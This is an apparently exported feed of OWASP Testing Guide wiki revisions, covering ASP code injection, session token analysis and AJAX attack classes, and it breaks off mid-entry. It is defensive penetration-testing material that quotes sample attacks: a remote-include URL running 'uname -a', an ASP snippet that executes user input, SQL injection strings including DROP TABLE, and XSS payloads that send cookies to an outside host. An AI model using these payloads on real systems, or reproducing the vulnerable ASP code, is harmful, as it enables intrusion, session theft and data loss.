 &amp;lt;nowiki&amp;gt;http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&amp;amp;cmd=uname%20-a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Result Expected:'''&lt;br /&gt;
&lt;br /&gt;
The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
'''Testing for ASP Code Injection vulnerabilities&lt;br /&gt;
&lt;br /&gt;
Examining ASP code for user input used in execution functions, e.g. Can the user enter commands into the Data input field?  Here, the ASP code will save it to file and then execute it:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;%&lt;br /&gt;
 If not isEmpty(Request( &amp;quot;Data&amp;quot; ) ) Then&lt;br /&gt;
 Dim fso, f&lt;br /&gt;
 'User input Data is written to a file named data.txt&lt;br /&gt;
 Set fso = CreateObject(&amp;quot;Scripting.FileSystemObject&amp;quot;)&lt;br /&gt;
 Set f = fso.OpenTextFile(Server.MapPath( &amp;quot;data.txt&amp;quot; ), 8, True)&lt;br /&gt;
 f.Write Request(&amp;quot;Data&amp;quot;) &amp;amp; vbCrLf&lt;br /&gt;
 f.close&lt;br /&gt;
 Set f = nothing&lt;br /&gt;
 Set fso = Nothing&lt;br /&gt;
&lt;br /&gt;
 'Data.txt is executed&lt;br /&gt;
 Server.Execute( &amp;quot;data.txt&amp;quot; )&lt;br /&gt;
&lt;br /&gt;
 Else&lt;br /&gt;
 %&amp;gt;&lt;br /&gt;
 &amp;lt;form&amp;gt;&lt;br /&gt;
 &amp;lt;input name=&amp;quot;Data&amp;quot; /&amp;gt;&amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Enter Data&amp;quot; /&amp;gt;&lt;br /&gt;
 &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;%&lt;br /&gt;
 End If&lt;br /&gt;
 %&amp;gt;)))&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* Security Focus - http://www.securityfocus.com&lt;br /&gt;
&lt;br /&gt;
* Insecure.org - http://www.insecure.org&lt;br /&gt;
&lt;br /&gt;
* Wikipedia - http://www.wikipedia.org&lt;br /&gt;
&lt;br /&gt;
* OWASP Code Review - http://www.owasp.org/index.php/OS_Injection&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Session_Management_Schema_(OTG-SESS-001)&amp;diff=14485</id>
		<title>Testing for Session Management Schema (OTG-SESS-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Session_Management_Schema_(OTG-SESS-001)&amp;diff=14485"/>
				<updated>2006-12-18T22:12:04Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
In order to avoid continuous authentication for each page of a website or service, web applications implement various mechanisms to store and validate credentials for a pre-determined timespan.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
These mechanisms are known as Session Management and while they're most important in order to increase the ease of use and user-friendliness of the application, they can be exploited by a pentester to gain access to a user account without the need to provide correct credentials.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
The session management schema should be considered alongside the authentication and authorization schema, and cover at least the questions below from a non-technical point of view:&lt;br /&gt;
* Will the application be accessed from shared systems? e.g. Internet Café	 &amp;lt;br&amp;gt;&lt;br /&gt;
* Is application security of prime concern to the visiting client/customer?	&amp;lt;br&amp;gt;&lt;br /&gt;
* How many concurrent sessions may a user have?	&amp;lt;br&amp;gt;&lt;br /&gt;
* How long is the inactive timeout on the application?&amp;lt;br&amp;gt;	&lt;br /&gt;
* How long is the active timeout?	&amp;lt;br&amp;gt;&lt;br /&gt;
* Are sessions transferable from one source IP to another?	&amp;lt;br&amp;gt;&lt;br /&gt;
* Is ‘remember my username’ functionality provided?	&amp;lt;br&amp;gt;&lt;br /&gt;
* Is ‘automatic login’ functionality provided?	&amp;lt;br&amp;gt;&lt;br /&gt;
Having identified the schema in place, the application and its logic must be examined to ensure the proper implementation of the schema.&lt;br /&gt;
This phase of testing is intrinsically linked with general application security testing.  Whilst the first Schema questions (is the schema suitable for the site and does the schema meet the application provider’s requirements?) can be analysed in abstract, the final question (does the site implement the specified schema?) must be considered alongside other technical testing. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The identified schema should be analyzed against best practice within the context of the site during our penetration test.&lt;br /&gt;
Where the defined schema deviates from security best practice, the associated risks should be identified and described within the context of the environment.  Security risks and issues should be detailed and quantified, but ultimately the application provider must make decisions based on the security and usability of the application.&lt;br /&gt;
For example, if it is determined that the site has been designed without inactive session timeouts, the application provider should be advised about risks such as replay attacks, long-term attacks based on stolen or compromised Session IDs, and abuse of a shared terminal where the application was not logged out.  They must then consider these against other requirements such as convenience of use for clients and disruption of the application by forced re-authentication.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
''' Session Management Implementation'''&amp;lt;br&amp;gt;&lt;br /&gt;
In this Chapter we describe how to analyse a Session Schema and how to test it. Technical security testing of Session Management implementation covers two key areas:&lt;br /&gt;
* Integrity of Session ID creation&lt;br /&gt;
* Secure management of active sessions and Session IDs&lt;br /&gt;
The Session ID should be sufficiently unpredictable and abstracted from any private information, and the Session management should be logically secured to prevent any manipulation or circumvention of application security.&lt;br /&gt;
These two key areas are interdependent, but should be considered separately for a number of reasons.&lt;br /&gt;
Firstly, the choice of underlying technology to provide the sessions is bewildering and can already include a large number of OTS products and an almost unlimited number of bespoke or proprietary implementations.  Whilst the same technical analysis must be performed on each, established vendor solutions may require a slightly different testing approach, and existing security research may exist on the implementation.&lt;br /&gt;
Secondly, even an unpredictable and abstract Session ID may be rendered completely ineffectual should the Session management be flawed.  Similarly, a strong and secure session management implementation may be undermined by a poor Session ID implementation.&lt;br /&gt;
Furthermore, the analyst should closely examine how (and if) the application uses the available Session management.  It is not uncommon to see Microsoft ISS server ASP Session IDs passed religiously back and forth during interaction with an application, only to discover that these are not used by the application logic at all.  It is therefore not correct to say that because an application is built on a ‘proven secure’ platform its Session Management is automatically secure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
''' Session Analysis'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The Session Tokens (Cookie, SessionID or Hidden Field) themselves should be examined to ensure their quality from a security perspective.  They should be tested against criteria such as their randomness, uniqueness, resistance to statistical and cryptographic analysis and information leakage.&amp;lt;br&amp;gt;&lt;br /&gt;
* Token Structure &amp;amp; Information Leakage&lt;br /&gt;
The first stage is to examine the structure and content of a Session ID provided by the application.  A common mistake is to include specific data in the Token instead of issuing a generic value and referencing real data at the server side.&lt;br /&gt;
If the Session ID is clear-text, the structure and pertinent data may be immediately obvious as the following:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
192.168.100.1:owaspuser:password:15:58&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If part or the entire Token appears to be encoded or hashed, it should be compared to various techniques to check for obvious obfuscation.&lt;br /&gt;
For example the string “192.168.100.1:owaspuser:password:15:58” is represented in Hex, Base64 and as an MD5 hash:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hex	3139322E3136382E3130302E313A6F77617370757365723A70617373776F72643A31353A3538&lt;br /&gt;
Base64	MTkyLjE2OC4xMDAuMTpvd2FzcHVzZXI6cGFzc3dvcmQ6MTU6NTg=&lt;br /&gt;
MD5	01c2fc4f0a817afd8366689bd29dd40a&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Having identified the type of obfuscation, it may be possible to decode back to the original data.  In most cases, however, this is unlikely.  Even so, it may be useful to enumerate the encoding in place from the format of the message.  Furthermore, if both the format and obfuscation technique can be deduced, automated brute-force attacks could be devised.&lt;br /&gt;
Hybrid Rokens may include information such as IP address or User ID together with an encoded portion, as the following:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
owaspuser:192.168.100.1: a7656fafe94dae72b1e1487670148412&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Having analysed a single Session Token, the representative sample should be examined.&lt;br /&gt;
A simple analysis of the Tokens should immediately reveal any obvious patterns.  For example, a 32 bit Token may include 16 bits of static data and 16 bits of variable data.  This may indicate that the first 16 bits represent a fixed attribute of the user – e.g. the username or IP address.&lt;br /&gt;
If the second 16 bit chunk is incrementing at a regular rate, it may indicate a sequential or even time-based element to the Token generation.  See Examples.&lt;br /&gt;
If static elements to the Tokens are identified, further samples should be gathered, varying one potential input element at a time.  For example, login attempts through a different user account or from a different IP address may yield a variance in the previously static portion of the Session Token.&lt;br /&gt;
The following areas should be addressed during the single and multiple Session ID structure testing:&lt;br /&gt;
* What parts of the Session ID are static?	&lt;br /&gt;
* What clear-text proprietary information is stored in the Session ID?  &lt;br /&gt;
e.g. usernames/UID, IP addresses	&lt;br /&gt;
* What easily decoded proprietary information is stored?	&lt;br /&gt;
* What information can be deduced from the structure of the Session ID?	&lt;br /&gt;
* What portions of the Session ID are static for the same login conditions?	&lt;br /&gt;
* What obvious patterns are present in the Session ID as a whole, or individual portions?	&lt;br /&gt;
 &lt;br /&gt;
'''Session ID Predictability and Randomness'''&amp;lt;br&amp;gt;&lt;br /&gt;
Analysis of the variable areas (if any) of the Session ID should be undertaken to establish the existence of any recognizable or predictable patterns.&lt;br /&gt;
These analysis may be performed manually and with bespoke or OTS statistical or cryptanalytic tools in order to deduce any patterns in Session ID content.&lt;br /&gt;
Manual checks should include comparisons of Session IDs issued for the same login conditions – e.g. the same username, password and IP address.  Time is an important factor which must also be controlled.  High numbers of simultaneous connections should be made in order to gather samples in the same time window and keep that variable constant.  Even a quantization of 50ms or less may be too coarse and a sample taken in this way may reveal time-based components that would otherwise be missed.&lt;br /&gt;
Variable elements should be analysed over time to determine whether they are incremental in nature.  Where they are incremental, patterns relating to absolute or elapsed time should be investigated.  Many systems use time as a seed for their pseudo random elements.&lt;br /&gt;
Where the patterns are seemingly random, one-way hashes of time or other environmental variations should be considered as a possibility.  Typically, the result of a cryptographic hash is a decimal or hexadecimal number so should be identifiable.&lt;br /&gt;
In analysing Session IDs sequences, patterns or cycles, static elements and client dependencies should all be considered as possible contributing elements to the structure and function of the application.&lt;br /&gt;
* Are the Session IDs provably random in nature?  e.g. Can the result be reproduced?  &lt;br /&gt;
* Do the same input conditions produce the same ID on a subsequent run?	&lt;br /&gt;
* Are the Session IDs provably resistant to statistical or cryptanalysis?	&lt;br /&gt;
* What elements of the Session IDs are time-linked?	&lt;br /&gt;
* What portions of the Session IDs are predictable?  	&lt;br /&gt;
* Can the next ID be deduced even given full knowledge of the generation algorithm and previous IDs?	&lt;br /&gt;
&lt;br /&gt;
'''Brute Force Attacks'''&amp;lt;br&amp;gt;&lt;br /&gt;
Brute force attacks inevitably lead on from questions relating to predictability and randomness.&lt;br /&gt;
The variance within the Session IDs must be considered together with application session durations and timeouts.  If the variation within the Session IDs is relatively small, and Session ID validity is long, the likelihood of a successful brute-force attack is much higher.&lt;br /&gt;
A long session ID (or rather one with a great deal of variance) and a shorter validity period would make it far harder to succeed in a brute force attack.&lt;br /&gt;
* How long would a brute-force attack on all possible Session IDs take?	&lt;br /&gt;
* Is the Session ID space large enough to prevent brute forcing? e.g. is the length of the key sufficient when compared to the valid life-span	&lt;br /&gt;
* Do delays between connection attempts with different Session IDs mitigate the risk of this attack?&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
If you can access to session management schema implementation, you can check for the following:&lt;br /&gt;
* Random Session Token&lt;br /&gt;
It's important that the sessionID or Cookie issued to the client will not easly predictable (don't use linear algorithm based on predictable variables like as data or client IPArddr). It's strongly encouraged the use of cryptographic algorithms as AES with minumum key lenght of 256 bits.&lt;br /&gt;
* Token lenght&lt;br /&gt;
SessionID will be at least 50 characters length.&lt;br /&gt;
* Session Time-out&lt;br /&gt;
Session token should have a defined time-out (it depends on the criticality of the application managed data)&lt;br /&gt;
* Cookie configuration&lt;br /&gt;
** non-persistent: only RAM memory&lt;br /&gt;
** secure (inviato solo su canale HTTPS):  Set Cookie: cookie=data; path=/; domain=.aaa.it; secure&lt;br /&gt;
** HTTPOnly (not readable by a script):  Set Cookie: cookie=data; path=/; domain=.aaa.it; HttpOnly&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Gunter Ollmann: &amp;quot;Web Based Session Management&amp;quot; - http://www.technicalinfo.net&lt;br /&gt;
* RFCs 2109 &amp;amp; 2965: &amp;quot;HTTP State Management Mechanism&amp;quot; - http://www.ietf.org/rfc/rfc2965.txt, http://www.ietf.org/rfc/rfc2109.txt&lt;br /&gt;
* RFC 2616: &amp;quot;Hypertext Transfer Protocol -- HTTP/1.1&amp;quot; - http://www.ietf.org/rfc/rfc2616.txt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=13711</id>
		<title>Testing for AJAX Vulnerabilities (OWASP-AJ-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=13711"/>
				<updated>2006-11-27T02:44:22Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since AJAX is still a new term, not much of a thought has been given towards its security implications.The security issues in AJAX include:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* A larger attack surface with many more inputs to secure&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Exposed internal functions of the Web application server&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Allows a client-side script to access third-party resources with no built-in security and encoding mechanisms&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Login Information and Intrusion Detection&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Attacks and Vulnerabilities == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''XMLHttpRequest Vulnerabilities'''&amp;lt;br&amp;gt; AJAX uses the XMLHttpRequest(XHR) object for all the back-end work. A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data, or anything else that Javascript can process.&amp;lt;p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Secondly, in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence, the login data is traversing the wire in clear text. Using secure HTTPS/SSLchannels  which the modern day browsers support is the easiest way to prevent such attacks from happening.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks such as SQL Injection, Cross Site Scripting(XSS), etc.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Increased Attack Surface''' &amp;lt;br&amp;gt;&lt;br /&gt;
Unlike traditional web applications that exist completely on the server, AJAX applications extend across the client and server, which gives the client some powers. This throws in additional ways to potentially inject malicious content.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SQL Injection'''&amp;lt;br&amp;gt;SQL Injection attacks are remote attacks on the database in which the attacker modifies the data on the database. &amp;lt;br&amp;gt; A typical SQL Injection attack could be as follows&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 1'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This query will always return one row (unless the table is empty), and it is likely to be the first entry in the table. For many applications, that entry is the administrative login - the one with the most privileges.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 2'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
The above query drops all the tables and destructs the database.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Cross Site Scripting'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Cross Site Scripting is a technique by which malicious content is injected in form of HTML links, Javascripts Alerts, or error messages. XSS exploits can be used for triggering various other attacks like cookie theft, account hijacking, and denial of service. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The Browser and AJAX Requests look identical, so the server is not able to classify them. Consequently, it won't be able to discern who made the request in the background. A JavaScript program can use AJAX to request for a resource that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information such as cookies to the request. JavaScript code can then access the response to this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site Scripting (XSS) attack.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Also, a XSS attack could send requests for specific pages other than the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The XSS payload can use AJAX requests to autonomously inject itself into pages and easily re-inject the same host with more XSS (like a virus), all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example''''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;howdy&amp;quot;)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;document.location='http://www.example.com/pag.pl?'%20+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Usage:''&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/login.php?variable=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://www.irr.com/cont.php?'+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Client Side Injection Threats'''&amp;lt;br&amp;gt;&lt;br /&gt;
* ''XSS exploits'' can give access to any client-side data, and can also modify the client-side code.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* ''DOM Injection'' is a type pf XSS injection which happens through the sub-objects ,document.location, document.URL, or document.referrer of the Document Object Model(DOM)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;&lt;br /&gt;
var pos=document.URL.indexOf(&amp;quot;name=&amp;quot;)+5;&lt;br /&gt;
document.write(document.URL.substring(pos,document.URL.length));&lt;br /&gt;
&amp;lt;/SCRIPT&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''AJAX Bridging'''&amp;lt;br&amp;gt;&lt;br /&gt;
For security purposes, AJAX applications can only connect back to the Website from which they come. For example, JavaScript with AJAX downloaded from yahoo.com cannot make connections to google.com. To allow AJAX to contact third-party sites in this manner, the AJAX service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection. An attacker could use this to access sites with restricted access.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Cross Site Request Forgery(CSRF)'''&amp;lt;br&amp;gt;&lt;br /&gt;
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of his choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly, CSRF could have transfered funds, posted comments, compromised email lists, or reconfigured the network. When a victim is forced to make a CSRF request, it will be authenticated if they have recently logged-in. The worst part is all system logs would verify that you in fact made the request. This attack, though not common, has been done before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Denial of Service'''&amp;lt;br&amp;gt;Denial of Service is an old attack in which an attacker or vulnerable application forces the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. In fact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks such as using image tags nested within a JavaScript loop can do the trick more effectively. AJAX, being on the client-side, makes the attack easier.&amp;lt;pre&amp;gt;&amp;lt;IMG SRC=&amp;quot;http://example.com/cgi-bin/ouch.cgi?a=b&amp;quot;&amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Browser Based Attacks'''&amp;lt;br&amp;gt;&lt;br /&gt;
The web browsers we use have not been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks, so our browsers are not prepared for newer attacks.&amp;lt;br&amp;gt;&lt;br /&gt;
There have been a number of new attacks on browsers, such as using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These could be computers that serve Web pages, but they could also include routers, printers, IP phones, and other networked devices or applications that have a Web interface. The JavaScript scanner determines whether there is a computer at an IP address by sending a &amp;quot;ping&amp;quot; using JavaScript &amp;quot;image&amp;quot; objects. It then determines which servers are running by looking for image files stored in standard places and analyzing the traffic and error messages it receives back. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&amp;lt;br&amp;gt;&amp;lt;p&amp;gt;Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. In addition, the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Major Attacks  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''MySpace Attack'''&amp;lt;br&amp;gt;The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed &amp;lt;SCRIPT&amp;gt; in MySpace.com profile. AJAX was used to inject a virus into the MySpace profile of any user viewing infected page and forced any user viewing the infected page to add the user “Samy” to his friend list. It also appended the words “Samy is my hero” to the victim's profile&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Yahoo! Mail Attack'''&amp;lt;br&amp;gt;In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and AJAX, took advantage of a vulnerability in Yahoo Mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the Yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which made it look like an email from a known user.&lt;br /&gt;
&lt;br /&gt;
== Testing == &lt;br /&gt;
'''OWASP Testing Guide sections on AJAX Testing''' provides information on various aspects of AJAX Testing. &amp;lt;br&amp;gt;&lt;br /&gt;
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]]&amp;lt;br&amp;gt;&lt;br /&gt;
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Testing Tools ==&lt;br /&gt;
&lt;br /&gt;
Here are some of the '''AJAX Testing Tools''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Venkman''' &amp;lt;br&amp;gt; [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''' Ghost Train'''&amp;lt;br&amp;gt;[http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and a test-generating and replaying add-on you can use with any web application.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Squish/Web (froglogic)'''&amp;lt;br&amp;gt;&lt;br /&gt;
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows you to record, edit, and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''JsUnit'''&amp;lt;br&amp;gt;[http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.&lt;br /&gt;
&lt;br /&gt;
== References == &lt;br /&gt;
&lt;br /&gt;
*[http://en.wikipedia.org/wiki/AJAX AJAX]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://ajaxpatterns.org AJAX Patterns] &lt;br /&gt;
&lt;br /&gt;
;'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, &amp;quot;Ajax(in) Security&amp;quot;,SPI Labs]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, &amp;quot;Analysis of Web Application Worms and Viruses&amp;quot;,SPI Labs]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, &amp;quot;Ajax Security Dangers&amp;quot;,SPI Labs]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;'''Articles'''&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. &amp;quot;DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS&amp;quot;, Web Application Security Consortium]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_AJAX:_introduction&amp;diff=13710</id>
		<title>Testing for AJAX: introduction</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_AJAX:_introduction&amp;diff=13710"/>
				<updated>2006-11-27T02:18:34Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: /* 4.9 AJAX Testing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== 4.9 AJAX Testing ===&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
